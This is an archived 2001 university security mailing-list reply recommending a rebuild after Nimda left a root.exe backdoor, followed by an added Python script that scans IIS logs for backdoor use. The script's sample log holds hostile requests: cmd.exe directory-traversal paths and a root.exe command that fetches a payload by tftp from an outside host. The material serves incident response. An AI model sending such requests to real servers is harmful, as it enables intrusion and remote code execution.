From: Mike Friedman (mikef@ack.berkeley.edu)
Date: Thu Sep 20 2001 - 10:56:34 PDT
On Wed Sep 19 22:36:25 2001, International & Area Studies said:
> After updates are applied, is there anything else we should do? McAfee is
> catching and deleting the Nimda virus on one of our servers. I did find
> the root.exe on the same server. I used the Code Red cleanup utility to
> erase it. It can be found at the following site...
> http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878
> (If you do this, be sure and restart www publishing services afterwards)
> Does this mean I should still rebuild the whole system?
Unfortunately, yes. The NIMDA worm leaves behind a 'backdoor' by which
any intruder could get into your system and further compromise it in other,
unknown, ways. This means that even though you have now cleaned out the
NIMDA-related files, there may be other things that were left on your system
by a subsequent attacker who got in while the NIMDA backdoor was in place.
The only way to be sure is to rebuild the system from a trusted source (e.g.,
CD media).
Mike
----------------------------------------------------------------------------
Mike Friedman mikef@ack.Berkeley.EDU
System & Network Security +1-510-642-1410
University of California at Berkeley http://ack.Berkeley.EDU/~mikef
----------------------------------------------------------------------------
-----------------------------------------------------------------------
The following was automatically added to this message by the list server:
Webnet information is available at <URL:http://wss.berkeley.edu/webnet/>.
This archive was generated by hypermail 2b29 : Thu Sep 20 2001 - 10:59:20 PDT
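Before the rebuild, one thing worth pulling off the box is evidence of who else drove the backdoor. root.exe is the copy of cmd.exe that Code Red II dropped into the /scripts and /MSADC virtual directories, and both it and the cmd.exe directory-traversal variants show up in the IIS logs as ordinary GET requests whose query string is the command. The script below is an added example for this thread, not code from Mike's reply or from the original poster; it assumes IIS W3C extended logs with the field layout shown in the #Fields: header, and the log lines and client addresses in it are constructed.

```python
"""Scan IIS W3C extended log lines for use of the root.exe backdoor and
the cmd.exe traversal variants, and summarise which clients drove it.

Added example for this thread, not code from the original message.
SAMPLE_LOG is constructed; the column layout follows the IIS 5.0 W3C
extended format.  All client addresses are hypothetical.
"""
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log (not from the page).  One normal browsing client,
# two clients that ran commands through the backdoor, one failed probe.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:02:11 10.0.0.5 GET /default.htm - 200
2001-09-18 13:02:45 192.0.2.17 GET /scripts/root.exe /c+dir 200
2001-09-18 13:02:46 192.0.2.17 GET /MSADC/root.exe /c+dir 200
2001-09-18 13:02:47 192.0.2.17 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:05:10 10.0.0.5 GET /images/logo.gif - 200
2001-09-19 02:14:33 198.51.100.9 GET /scripts/root.exe /c+tftp+-i+198.51.100.9+GET+Admin.dll+c:\Admin.dll 200
2001-09-19 02:14:40 198.51.100.9 GET /scripts/root.exe /c+dir+c:\winnt 200
2001-09-19 09:30:01 203.0.113.44 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
"""

# Programs whose presence in a request path means the client is driving a
# shell rather than fetching content.  root.exe is the cmd.exe copy dropped
# by Code Red II; cmd.exe is reached directly via the IIS traversal bugs.
SHELL_TARGETS = ("root.exe", "cmd.exe")


def parse_iis_log(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # cannot map this line to columns; skip it
        yield dict(zip(fields, parts))


def normalize_path(stem):
    """Decode twice so %255c (double-encoded backslash) and %5c both collapse,
    then fold backslashes into slashes and lower-case for matching."""
    return unquote(unquote(stem)).replace("\\", "/").lower()


def is_backdoor_request(record):
    path = normalize_path(record["cs-uri-stem"])
    return any(target in path for target in SHELL_TARGETS)


def find_backdoor_use(text):
    """Return {client_ip: summary} for every client that invoked the shell.

    A 200 status means the backdoor was present and the command ran; any
    other status is a probe that failed.  Both belong on the incident
    timeline, because a failed probe still names a host that was looking.
    """
    hits = defaultdict(lambda: {"requests": 0, "executed": 0,
                                "first": None, "last": None, "commands": []})
    for rec in parse_iis_log(text):
        if not is_backdoor_request(rec):
            continue
        stamp = f"{rec['date']} {rec['time']}"
        # The query string is the command line handed to the shell.
        command = unquote(rec["cs-uri-query"].replace("+", " "))
        entry = hits[rec["c-ip"]]
        entry["requests"] += 1
        if rec["sc-status"] == "200":
            entry["executed"] += 1
        entry["first"] = entry["first"] or stamp
        entry["last"] = stamp
        if command not in entry["commands"]:
            entry["commands"].append(command)
    return dict(hits)


if __name__ == "__main__":
    for ip, entry in sorted(find_backdoor_use(SAMPLE_LOG).items()):
        print(f"{ip}: {entry['requests']} shell requests, "
              f"{entry['executed']} executed, {entry['first']} .. {entry['last']}")
        for command in entry["commands"]:
            print(f"    {command}")
```

Run it against the server's ex*.log files instead of SAMPLE_LOG and you get, per client address, what was run and whether it succeeded; the tftp line in the constructed sample is the shape of a worm fetching its payload, while a bare "dir" from an address that is not a known worm source is the kind of thing a human operator types. An empty result does not change the answer above: anyone who had a shell on the box could also have cleared or disabled the logs, so this is for the timeline, not for deciding against the rebuild.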